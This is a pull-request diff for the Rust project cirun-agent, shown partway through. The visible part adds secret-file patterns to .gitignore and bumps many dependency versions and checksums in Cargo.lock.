### PR TITLE
Refactor: unify docker/meda/lume behind Executor trait

### DIFF
--- a/.gitignore
+++ b/.gitignore
@@ -3,3 +3,10 @@
 # agent id
 .agent_id
 .aider*
+
+# secrets — local dev env, never commit
+.env
+.env.*
+*.token
+*.key
+*.pem

--- a/Cargo.lock
+++ b/Cargo.lock
@@ -3,34 +3,19 @@
 version = 4
 
 [[package]]
-name = "addr2line"
-version = "0.24.2"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "dfbe277e56a376000877090da837660b4427aad530e3028d44e0bffe4f89a1c1"
-dependencies = [
- "gimli",
-]
-
-[[package]]
 name = "adler2"
-version = "2.0.0"
+version = "2.0.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "512761e0bb2578dd7380c6baaa0f4ce03e84f95e960231d1dec8bf4d7d6e2627"
+checksum = "320119579fcad9c21884f5c4861d16174d0e06250625266f50fe6898340abefa"
 
 [[package]]
 name = "aho-corasick"
-version = "1.1.3"
+version = "1.1.4"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "8e60d3430d3a69478ad0993f19238d2df97c507009a52b3c10addcd7f6bcb916"
+checksum = "ddd31a130427c27518df266943a5308ed92d4b226cc639f5a8f1002816174301"
 dependencies = [
  "memchr",
 ]
-
-[[package]]
-name = "android-tzdata"
-version = "0.1.1"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "e999941b234f3131b00bc13c22d06e8c5ff726d1b6318ac7eb276997bbb4fef0"
 
 [[package]]
 name = "android_system_properties"
@@ -43,9 +28,9 @@ dependencies = [
 
 [[package]]
 name = "anstream"
-version = "0.6.18"
+version = "1.0.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "8acc5369981196006228e28809f761875c0327210a891e941f4c683b3a99529b"
+checksum = "824a212faf96e9acacdbd09febd34438f8f711fb84e09a8916013cd7815ca28d"
 dependencies = [
  "anstyle",
  "anstyle-parse",
@@ -58,44 +43,55 @@ dependencies = [
 
 [[package]]
 name = "anstyle"
-version = "1.0.10"
+version = "1.0.14"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "55cc3b69f167a1ef2e161439aa98aed94e6028e5f9a59be9a6ffb47aef1651f9"
+checksum = "940b3a0ca603d1eade50a4846a2afffd5ef57a9feac2c0e2ec2e14f9ead76000"
 
 [[package]]
 name = "anstyle-parse"
-version = "0.2.6"
+version = "1.0.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "3b2d16507662817a6a20a9ea92df6652ee4f94f914589377d69f3b21bc5798a9"
+checksum = "52ce7f38b242319f7cabaa6813055467063ecdc9d355bbb4ce0c68908cd8130e"
 dependencies = [
  "utf8parse",
 ]
 
 [[package]]
 name = "anstyle-query"
-version = "1.1.2"
+version = "1.1.5"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "79947af37f4177cfead1110013d678905c37501914fba0efea834c3fe9a8d60c"
+checksum = "40c48f72fd53cd289104fc64099abca73db4166ad86ea0b4341abe65af83dadc"
 dependencies = [
- "windows-sys 0.59.0",
+ "windows-sys 0.61.2",
 ]
 
 [[package]]
 name = "anstyle-wincon"
-version = "3.0.7"
+version = "3.0.11"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "ca3534e77181a9cc07539ad51f2141fe32f6c3ffd4df76db8ad92346b003ae4e"
+checksum = "291e6a250ff86cd4a820112fb8898808a366d8f9f58ce16d1f538353ad55747d"
 dependencies = [
  "anstyle",
- "once_cell",
- "windows-sys 0.59.0",
+ "once_cell_polyfill",
+ "windows-sys 0.61.2",
 ]
 
 [[package]]
 name = "anyhow"
-version = "1.0.97"
+version = "1.0.102"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "dcfed56ad506cb2c684a14971b8861fdc3baaaae314b9e5f9bb532cbe3ba7a4f"
+checksum = "7f202df86484c868dbad7eaa557ef785d5c66295e41b460ef922eca0723b842c"
+
+[[package]]
+name = "async-trait"
+version = "0.1.89"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "9035ad2d096bed7955a320ee7e2230574d28fd3c3a0f186cbea1ff3c7eed5dbb"
+dependencies = [
+ "proc-macro2",
+ "quote",
+ "syn",
+]
 
 [[package]]
 name = "atomic-waker"
@@ -105,34 +101,19 @@ checksum = "1505bd5d3d116872e7271a6d4e16d81d0c8570876c8de68093a09ac269d8aac0"
 
 [[package]]
 name = "autocfg"
-version = "1.4.0"
+version = "1.5.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "ace50bade8e6234aa140d9a2f552bbee1db4d353f69b8217bc503490fc1a9f26"
+checksum = "c08606f8c3cbf4ce6ec8e28fb0014a2c086708fe954eaa885384a6165172e7e8"
 
 [[package]]
 name = "backon"
-version = "1.4.0"
+version = "1.6.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "49fef586913a57ff189f25c9b3d034356a5bf6b3fa9a7f067588fe1698ba1f5d"
+checksum = "cffb0e931875b666fc4fcb20fee52e9bbd1ef836fd9e9e04ec21555f9f85f7ef"
 dependencies = [
  "fastrand",
  "gloo-timers",
  "tokio",
-]
-
-[[package]]
-name = "backtrace"
-version = "0.3.74"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "8d82cb332cdfaed17ae235a638438ac4d4839913cc2af585c3c6746e8f8bee1a"
-dependencies = [
- "addr2line",
- "cfg-if",
- "libc",
- "miniz_oxide",
- "object",
- "rustc-demangle",
- "windows-targets 0.52.6",
 ]
 
 [[package]]
@@ -143,44 +124,44 @@ checksum = "72b3254f16251a8381aa12e40e3c4d2f0199f8c6508fbecb9d91f575e0fbb8c6"
 
 [[package]]
 name = "bitflags"
-version = "2.9.0"
+version = "2.11.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "5c8214115b7bf84099f1309324e63141d4c5d7cc26862f97a0a857dbefe165bd"
+checksum = "c4512299f36f043ab09a583e57bceb5a5aab7a73db1805848e8fef3c9e8c78b3"
 
 [[package]]
 name = "bumpalo"
-version = "3.17.0"
+version = "3.20.2"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "1628fb46dfa0b37568d12e5edd512553eccf6a22a78e8bde00bb4aed84d5bdbf"
+checksum = "5d20789868f4b01b2f2caec9f5c4e0213b41e3e5702a50157d699ae31ced2fcb"
 
 [[package]]
 name = "bytes"
-version = "1.10.1"
+version = "1.11.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "d71b6127be86fdcfddb610f7182ac57211d4b18a3e9c82eb2d17662f2227ad6a"
+checksum = "1e748733b7cbc798e1434b6ac524f0c1ff2ab456fe201501e6497c8417a4fc33"
 
 [[package]]
 name = "cc"
-version = "1.2.16"
+version = "1.2.62"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "be714c154be609ec7f5dad223a33bf1482fff90472de28f7362806e6d4832b8c"
+checksum = "a1dce859f0832a7d088c4f1119888ab94ef4b5d6795d1ce05afb7fe159d79f98"
 dependencies = [
+ "find-msvc-tools",
  "shlex",
 ]
 
 [[package]]
 name = "cfg-if"
-version = "1.0.0"
+version = "1.0.4"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "baf1de4339761588bc0619e3cbc0120ee582ebb74b53b4efbf79117bd2da40fd"
+checksum = "9330f8b2ff13f34540b44e946ef35111825727b38d33286ef986142615121801"
 
 [[package]]
 name = "chrono"
-version = "0.4.40"
+version = "0.4.44"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "1a7964611d71df112cb1730f2ee67324fcf4d0fc6606acbbe9bfe06df124637c"
+checksum = "c673075a2e0e5f4a1dde27ce9dee1ea4558c7ffe648f576438a20ca1d2acc4b0"
 dependencies = [
- "android-tzdata",
  "iana-time-zone",
  "js-sys",
  "num-traits",
@@ -193,6 +174,7 @@ name = "cirun-agent"
 version = "0.4.0"
 dependencies = [
  "anyhow",
+ "async-trait",
  "backon",
  "chrono",
  "clap",
@@ -213,9 +195,9 @@ dependencies = [
 
 [[package]]
 name = "clap"
-version = "4.5.32"
+version = "4.6.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "6088f3ae8c3608d19260cd7445411865a485688711b78b5be70d78cd96136f83"
+checksum = "1ddb117e43bbf7dacf0a4190fef4d345b9bad68dfc649cb349e7d17d28428e51"
 dependencies = [
  "clap_builder",
  "clap_derive",
@@ -223,9 +205,9 @@ dependencies = [
 
 [[package]]
 name = "clap_builder"
-version = "4.5.32"
+version = "4.6.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "22a7ef7f676155edfb82daa97f99441f3ebf4a58d5e32f295a56259f1b6facc8"
+checksum = "714a53001bf66416adb0e2ef5ac857140e7dc3a0c48fb28b2f10762fc4b5069f"
 dependencies = [
  "anstream",
  "anstyle",
@@ -235,9 +217,9 @@ dependencies = [
 
 [[package]]
 name = "clap_derive"
-version = "4.5.32"
+version = "4.6.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "09176aae279615badda0765c0c0b3f6ed53f4709118af73cf4655d85d1530cd7"
+checksum = "f2ce8604710f6733aa641a2b3731eaa1e8b3d9973d5e3565da11800813f997a9"
 dependencies = [
  "heck",
  "proc-macro2",
@@ -247,21 +229,31 @@ dependencies = [
 
 [[package]]
 name = "clap_lex"
-version = "0.7.4"
+version = "1.1.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "f46ad14479a25103f283c0f10005961cf086d8dc42205bb44c46ac563475dca6"
+checksum = "c8d4a3bb8b1e0c1050499d1815f5ab16d04f0959b233085fb31653fbfc9d98f9"
 
 [[package]]
 name = "colorchoice"
-version = "1.0.3"
+version = "1.0.5"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "5b63caa9aa9397e2d9480a9b13673856c78d8ac123288526c37d7839f2a86990"
+checksum = "1d07550c9036bf2ae0c684c4297d503f838287c83c53686d05370d0e139ae570"
 
 [[package]]
 name = "core-foundation"
 version = "0.9.4"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "91e195e091a93c46f7102ec7818a2aa394e1e1771c3ab4825963fa03e45afb8f"
+dependencies = [
+ "core-foundation-sys",
+ "libc",
+]
+
+[[package]]
+name = "core-foundation"
+version = "0.10.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "b2a6cd9ae233e7f62ba4e9353e81a88df7fc8a5987b8d445b4d90c879bd156f6"
 dependencies = [
  "core-foundation-sys",
  "libc",
@@ -275,9 +267,9 @@ checksum = "773648b94d0e5d620f64f280777445740e61fe701025087ec8b57f45c791888b"
 
 [[package]]
 name = "crc32fast"
-version = "1.4.2"
+version = "1.5.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "a97769d94ddab943e4510d138150169a2758b5ef3eb191a9ee688de3e23ef7b3"
+checksum = "9481c1c90cbf2ac953f07c8d4a58aa3945c425b7185c9154d67a65e4230da511"
 dependencies = [
  "cfg-if",
 ]
@@ -304,9 +296,9 @@ dependencies = [
 
 [[package]]
 name = "env_filter"
-version = "0.1.3"
+version = "1.0.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "186e05a59d4c50738528153b83b0b0194d3a29507dfec16eccd4b342903397d0"
+checksum = "32e90c2accc4b07a8456ea0debdc2e7587bdd890680d71173a15d4ae604f6eef"
 dependencies = [
  "log",
  "regex",
@@ -314,9 +306,9 @@ dependencies = [
 
 [[package]]
 name = "env_logger"
-version = "0.11.7"
+version = "0.11.10"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "c3716d7a920fb4fac5d84e9d4bce8ceb321e9414b4409da61b07b75c1e3d0697"
+checksum = "0621c04f2196ac3f488dd583365b9c09be011a4ab8b9f37248ffcc8f6198b56a"
 dependencies = [
  "anstream",
  "anstyle",
@@ -333,37 +325,41 @@ checksum = "877a4ace8713b0bcf2a4e7eec82529c029f1d0619886d18145fea96c3ffe5c0f"
 
 [[package]]
 name = "errno"
-version = "0.3.10"
+version = "0.3.14"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "33d852cb9b869c2a9b3df2f71a3074817f01e1844f839a144f5fcef059a4eb5d"
+checksum = "39cab71617ae0d63f51a36d69f866391735b51691dbda63cf6f96d042b63efeb"
 dependencies = [
  "libc",
- "windows-sys 0.59.0",
+ "windows-sys 0.61.2",
 ]
 
 [[package]]
 name = "fastrand"
-version = "2.3.0"
+version = "2.4.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "37909eebbb50d72f9059c3b6d82c0463f2ff062c9e95845c43a6c9c0355411be"
+checksum = "9f1f227452a390804cdb637b74a86990f2a7d7ba4b7d5693aac9b4dd6defd8d6"
 
 [[package]]
 name = "filetime"
-version = "0.2.25"
+version = "0.2.29"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "35c0522e981e68cbfa8c3f978441a5f34b30b96e146b33cd3359176b50fe8586"
+checksum = "5c287a33c7f0a620c38e641e7f60827713987b3c0f26e8ddc9462cc69cf75759"
 dependencies = [
  "cfg-if",
  "libc",
- "libredox",
- "windows-sys 0.59.0",
 ]
 
 [[package]]
-name = "flate2"
-version = "1.1.0"
+name = "find-msvc-tools"
+version = "0.1.9"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "11faaf5a5236997af9848be0bef4db95824b1d534ebc64d0f0c6cf3e67bd38dc"
+checksum = "5baebc0774151f905a1a2cc41989300b1e6fbb29aff0ceffa1064fdd3088d582"
+
+[[package]]
+name = "flate2"
+version = "1.1.9"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "843fba2746e448b37e26a819579957415c8cef339bf08564fe8b7ddbd959573c"
 dependencies = [
  "crc32fast",
  "miniz_oxide",
@@ -374,6 +370,12 @@ name = "fnv"
 version = "1.0.7"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "3f9eec918d3f24069decb9af1554cad7c880e2da24a9afd88aca000531ab82c1"
+
+[[package]]
+name = "foldhash"
+version = "0.1.5"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "d9c4f5dac5e15c24eb999c26181a6ca40b39fe946cbe4c263c7209467bc83af2"
 
 [[package]]
 name = "foreign-types"
@@ -392,80 +394,75 @@ checksum = "00b0228411908ca8685dba7fc2cdd70ec9990a6e753e89b6ac91a84c40fbaf4b"
 
 [[package]]
 name = "form_urlencoded"
-version = "1.2.1"
+version = "1.2.2"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "e13624c2627564efccf4934284bdd98cbaa14e79b0b5a141218e507b3a823456"
+checksum = "cb4cb245038516f5f85277875cdaa4f7d2c9a0fa0468de06ed190163b1581fcf"
 dependencies = [
  "percent-encoding",
 ]
 
 [[package]]
 name = "futures-channel"
-version = "0.3.31"
+version = "0.3.32"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "2dff15bf788c671c1934e366d07e30c1814a8ef514e1af724a602e8a2fbe1b10"
+checksum = "07bbe89c50d7a535e539b8c17bc0b49bdb77747034daa8087407d655f3f7cc1d"
 dependencies = [
  "futures-core",
 ]
 
 [[package]]
 name = "futures-core"
-version = "0.3.31"
+version = "0.3.32"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "05f29059c0c2090612e8d742178b0580d2dc940c837851ad723096f87af6663e"
+checksum = "7e3450815272ef58cec6d564423f6e755e25379b217b0bc688e295ba24df6b1d"
 
 [[package]]
 name = "futures-sink"
-version = "0.3.31"
+version = "0.3.32"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "e575fab7d1e0dcb8d0c7bcf9a63ee213816ab51902e6d244a95819acacf1d4f7"
+checksum = "c39754e157331b013978ec91992bde1ac089843443c49cbc7f46150b0fad0893"
 
 [[package]]
 name = "futures-task"
-version = "0.3.31"
+version = "0.3.32"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "f90f7dce0722e95104fcb095585910c0977252f286e354b5e3bd38902cd99988"
+checksum = "037711b3d59c33004d3856fbdc83b99d4ff37a24768fa1be9ce3538a1cde4393"
 
 [[package]]
 name = "futures-util"
-version = "0.3.31"
+version = "0.3.32"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "9fa08315bb612088cc391249efdc3bc77536f16c91f6cf495e6fbe85b20a4a81"
+checksum = "389ca41296e6190b48053de0321d02a77f32f8a5d2461dd38762c0593805c6d6"
 dependencies = [
  "futures-core",
  "futures-task",
  "pin-project-lite",
- "pin-utils",
+ "slab",
 ]
 
 [[package]]
 name = "getrandom"
-version = "0.2.15"
+version = "0.2.17"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "c4567c8db10ae91089c99af84c68c38da3ec2f087c3f82960bcdbf3656b6f4d7"
+checksum = "ff2abc00be7fca6ebc474524697ae276ad847ad0a6b3faa4bcb027e9a4614ad0"
 dependencies = [
  "cfg-if",
  "libc",
- "wasi 0.11.0+wasi-snapshot-preview1",
+ "wasi",
 ]
 
 [[package]]
 name = "getrandom"
-version = "0.3.1"
+version = "0.4.2"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "43a49c392881ce6d5c3b8cb70f98717b7c07aabbdff06687b9030dbfbe2725f8"
+checksum = "0de51e6874e94e7bf76d726fc5d13ba782deca734ff60d5bb2fb2607c7406555"
 dependencies = [
  "cfg-if",
  "libc",
- "wasi 0.13.3+wasi-0.2.2",
- "windows-targets 0.52.6",
+ "r-efi",
+ "wasip2",
+ "wasip3",
 ]
-
-[[package]]
-name = "gimli"
-version = "0.31.1"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "07e28edb80900c19c28f1072f2e8aeca7fa06b23cd4169cefe1af5aa3260783f"
 
 [[package]]
 name = "gloo-timers"
@@ -481,9 +478,9 @@ dependencies = [
 
 [[package]]
 name = "h2"
-version = "0.4.8"
+version = "0.4.14"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "5017294ff4bb30944501348f6f8e42e6ad28f42c8bbef7a74029aff064a4e3c2"
+checksum = "171fefbc92fe4a4de27e0698d6a5b392d6a0e333506bc49133760b3bcf948733"
 dependencies = [
  "atomic-waker",
  "bytes",
@@ -500,9 +497,18 @@ dependencies = [
 
 [[package]]
 name = "hashbrown"
-version = "0.15.2"
+version = "0.15.5"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "bf151400ff0baff5465007dd2f3e717f3fe502074ca563069ce3a6629d07b289"
+checksum = "9229cfe53dfd69f0609a49f65461bd93001ea1ef889cd5529dd176593f5338a1"
+dependencies = [
+ "foldhash",
+]
+
+[[package]]
+name = "hashbrown"
+version = "0.17.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "ed5909b6e89a2db4456e54cd5f673791d7eca6732202bbf2a9cc504fe2f9b84a"
 
 [[package]]
 name = "heck"
@@ -512,12 +518,11 @@ checksum = "2304e00983f87ffb38b55b444b5e3b60a884b5d30c0fca7d82fe33449bbe55ea"
 
 [[package]]
 name = "http"
-version = "1.3.1"
+version = "1.4.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "f4a85d31aea989eead29a3aaf9e1115a180df8282431156e533de47660892565"
+checksum = "e3ba2a386d7f85a81f119ad7498ebe444d2e22c2af0b86b069416ace48b3311a"
 dependencies = [
  "bytes",
- "fnv",
  "itoa",
 ]
 
@@ -552,13 +557,14 @@ checksum = "6dbf3de79e51f3d586ab4cb9d5c3e2c14aa28ed23d180cf89b4df0454a69cc87"
 
 [[package]]
 name = "hyper"
-version = "1.6.0"
+version = "1.9.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "cc2b571658e38e0c01b1fdca3bbbe93c00d3d71693ff2770043f8c29bc7d6f80"
+checksum = "6299f016b246a94207e63da54dbe807655bf9e00044f73ded42c3ac5305fbcca"
 dependencies = [
+ "atomic-waker",
  "bytes",
  "futures-channel",
- "futures-util",
+ "futures-core",
  "h2",
  "http",
  "http-body",
@@ -572,16 +578,14 @@ dependencies = [
 
 [[package]]
 name = "hyper-rustls"
-version = "0.27.5"
+version = "0.27.9"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "2d191583f3da1305256f22463b9bb0471acad48a4e534a5218b9963e9c1f59b2"
+checksum = "33ca68d021ef39cf6463ab54c1d0f5daf03377b70561305bb89a8f83aab66e0f"
 dependencies = [
- "futures-util",
  "http",
  "hyper",
  "hyper-util",
  "rustls",
- "rustls-pki-types",
  "tokio",
  "tokio-rustls",
  "tower-service",
@@ -605,33 +609,40 @@ dependencies = [
 
 [[package]]
 name = "hyper-util"
-version = "0.1.10"
+version = "0.1.20"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "df2dcfbe0677734ab2f3ffa7fa7bfd4706bfdc1ef393f2ee30184aed67e631b4"
+checksum = "96547c2556ec9d12fb1578c4eaf448b04993e7fb79cbaad930a656880a6bdfa0"
 dependencies = [
+ "base64",
  "bytes",
  "futures-channel",
  "futures-util",
  "http",
  "http-body",
  "hyper",
+ "ipnet",
+ "libc",
+ "percent-encoding",
  "pin-project-lite",
  "socket2",
+ "system-configuration",
  "tokio",
  "tower-service",
  "tracing",
+ "windows-registry",
 ]
 
 [[package]]
 name = "iana-time-zone"
-version = "0.1.61"
+version = "0.1.65"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "235e081f3925a06703c2d0117ea8b91f042756fd6e7a6e5d901e8ca1a996b220"
+checksum = "e31bc9ad994ba00e440a8aa5c9ef0ec67d5cb5e5cb0cc7f8b744a35b389cc470"
 dependencies = [
  "android_system_properties",
  "core-foundation-sys",
  "iana-time-zone-haiku",
  "js-sys",
+ "log",
  "wasm-bindgen",
  "windows-core",
 ]
@@ -647,21 +658,23 @@ dependencies = [
 
 [[package]]
 name = "icu_collections"
-version = "1.5.0"
+version = "2.2.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "db2fa452206ebee18c4b5c2274dbf1de17008e874b4dc4f0aea9d01ca79e4526"
+checksum = "2984d1cd16c883d7935b9e07e44071dca8d917fd52ecc02c04d5fa0b5a3f191c"
 dependencies = [
  "displaydoc",
+ "potential_utf",
+ "utf8_iter",
  "yoke",
  "zerofrom",
  "zerovec",
 ]
 
 [[package]]
-name = "icu_locid"
-version = "1.5.0"
+name = "icu_locale_core"
+version = "2.2.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "13acbb8371917fc971be86fc8057c41a64b521c184808a698c02acc242dbf637"
+checksum = "92219b62b3e2b4d88ac5119f8904c10f8f61bf7e95b640d25ba3075e6cac2c29"
 dependencies = [
  "displaydoc",
  "litemap",
@@ -671,103 +684,71 @@ dependencies = [
 ]
 
 [[package]]
-name = "icu_locid_transform"
-version = "1.5.0"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "01d11ac35de8e40fdeda00d9e1e9d92525f3f9d887cdd7aa81d727596788b54e"
-dependencies = [
- "displaydoc",
- "icu_locid",
- "icu_locid_transform_data",
- "icu_provider",
- "tinystr",
- "zerovec",
-]
-
-[[package]]
-name = "icu_locid_transform_data"
-version = "1.5.0"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "fdc8ff3388f852bede6b579ad4e978ab004f139284d7b28715f773507b946f6e"
-
-[[package]]
 name = "icu_normalizer"
-version = "1.5.0"
+version = "2.2.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "19ce3e0da2ec68599d193c93d088142efd7f9c5d6fc9b803774855747dc6a84f"
+checksum = "c56e5ee99d6e3d33bd91c5d85458b6005a22140021cc324cea84dd0e72cff3b4"
 dependencies = [
- "displaydoc",
  "icu_collections",
  "icu_normalizer_data",
  "icu_properties",
  "icu_provider",
  "smallvec",
- "utf16_iter",
- "utf8_iter",
- "write16",
  "zerovec",
 ]
 
 [[package]]
 name = "icu_normalizer_data"
-version = "1.5.0"
+version = "2.2.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "f8cafbf7aa791e9b22bec55a167906f9e1215fd475cd22adfcf660e03e989516"
+checksum = "da3be0ae77ea334f4da67c12f149704f19f81d1adf7c51cf482943e84a2bad38"
 
 [[package]]
 name = "icu_properties"
-version = "1.5.1"
+version = "2.2.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "93d6020766cfc6302c15dbbc9c8778c37e62c14427cb7f6e601d849e092aeef5"
+checksum = "bee3b67d0ea5c2cca5003417989af8996f8604e34fb9ddf96208a033901e70de"
 dependencies = [
- "displaydoc",
  "icu_collections",
- "icu_locid_transform",
+ "icu_locale_core",
  "icu_properties_data",
  "icu_provider",
- "tinystr",
+ "zerotrie",
  "zerovec",
 ]
 
 [[package]]
 name = "icu_properties_data"
-version = "1.5.0"
+version = "2.2.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "67a8effbc3dd3e4ba1afa8ad918d5684b8868b3b26500753effea8d2eed19569"
+checksum = "8e2bbb201e0c04f7b4b3e14382af113e17ba4f63e2c9d2ee626b720cbce54a14"
 
 [[package]]
 name = "icu_provider"
-version = "1.5.0"
+version = "2.2.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "6ed421c8a8ef78d3e2dbc98a973be2f3770cb42b606e3ab18d6237c4dfde68d9"
+checksum = "139c4cf31c8b5f33d7e199446eff9c1e02decfc2f0eec2c8d71f65befa45b421"
 dependencies = [
  "displaydoc",
- "icu_locid",
- "icu_provider_macros",
- "stable_deref_trait",
- "tinystr",
+ "icu_locale_core",
  "writeable",
  "yoke",
  "zerofrom",
+ "zerotrie",
  "zerovec",
 ]
 
 [[package]]
-name = "icu_provider_macros"
-version = "1.5.0"
+name = "id-arena"
+version = "2.3.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "1ec89e9337638ecdc08744df490b221a7399bf8d164eb52a665454e60e075ad6"
-dependencies = [
- "proc-macro2",
- "quote",
- "syn",
-]
+checksum = "3d3067d79b975e8844ca9eb072e16b31c3c1c36928edf9c6789548c524d0d954"
 
 [[package]]
 name = "idna"
-version = "1.0.3"
+version = "1.1.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "686f825264d630750a544639377bae737628043f20d38bbc029e8f29ea968a7e"
+checksum = "3b0875f23caa03898994f6ddc501886a45c7d3d62d04d2d90788d47be1b1e4de"
 dependencies = [
  "idna_adapter",
  "smallvec",
@@ -776,9 +757,9 @@ dependencies = [
 
 [[package]]
 name = "idna_adapter"
-version = "1.2.0"
+version = "1.2.2"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "daca1df1c957320b2cf139ac61e7bd64fed304c5040df000a745aa1de3b4ef71"
+checksum = "cb68373c0d6620ef8105e855e7745e18b0d00d3bdb07fb532e434244cdb9a714"
 dependencies = [
  "icu_normalizer",
  "icu_properties",
@@ -786,50 +767,52 @@ dependencies = [
 
 [[package]]
 name = "indexmap"
-version = "2.8.0"
+version = "2.14.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "3954d50fe15b02142bf25d3b8bdadb634ec3948f103d04ffe3031bc8fe9d7058"
+checksum = "d466e9454f08e4a911e14806c24e16fba1b4c121d1ea474396f396069cf949d9"
 dependencies = [
  "equivalent",
- "hashbrown",
+ "hashbrown 0.17.1",
+ "serde",
+ "serde_core",
 ]
 
 [[package]]
 name = "ipnet"
-version = "2.11.0"
+version = "2.12.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "469fb0b9cefa57e3ef31275ee7cacb78f2fdca44e4765491884a2b119d4eb130"
+checksum = "d98f6fed1fde3f8c21bc40a1abb88dd75e67924f9cffc3ef95607bad8017f8e2"
 
 [[package]]
 name = "is_terminal_polyfill"
-version = "1.70.1"
+version = "1.70.2"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "7943c866cc5cd64cbc25b2e01621d07fa8eb2a1a23160ee81ce38704e97b8ecf"
+checksum = "a6cb138bb79a146c1bd460005623e142ef0181e3d0219cb493e02f7d08a35695"
 
 [[package]]
 name = "itoa"
-version = "1.0.15"
+version = "1.0.18"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "4a5f13b858c8d314ee3e8f639011f7ccefe71f97f96e50151fb991f267928e2c"
+checksum = "8f42a60cbdf9a97f5d2305f08a87dc4e09308d1276d28c869c684d7777685682"
 
 [[package]]
 name = "jiff"
-version = "0.2.4"
+version = "0.2.24"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "d699bc6dfc879fb1bf9bdff0d4c56f0884fc6f0d0eb0fba397a6d00cd9a6b85e"
+checksum = "f00b5dbd620d61dfdcb6007c9c1f6054ebd75319f163d886a9055cec1155073d"
 dependencies = [
  "jiff-static",
  "log",
  "portable-atomic",
  "portable-atomic-util",
- "serde",
+ "serde_core",
 ]
 
 [[package]]
 name = "jiff-static"
-version = "0.2.4"
+version = "0.2.24"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "8d16e75759ee0aa64c57a56acbf43916987b20c77373cb7e808979e02b93c9f9"
+checksum = "e000de030ff8022ea1da3f466fbb0f3a809f5e51ed31f6dd931c35181ad8e6d7"
 dependencies = [
  "proc-macro2",
  "quote",
@@ -838,64 +821,60 @@ dependencies = [
 
 [[package]]
 name = "js-sys"
-version = "0.3.77"
+version = "0.3.98"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "1cfaf33c695fc6e08064efbc1f72ec937429614f25eef83af942d0e227c3a28f"
+checksum = "67df7112613f8bfd9150013a0314e196f4800d3201ae742489d999db2f979f08"
 dependencies = [
+ "cfg-if",
+ "futures-util",
  "once_cell",
  "wasm-bindgen",
 ]
 
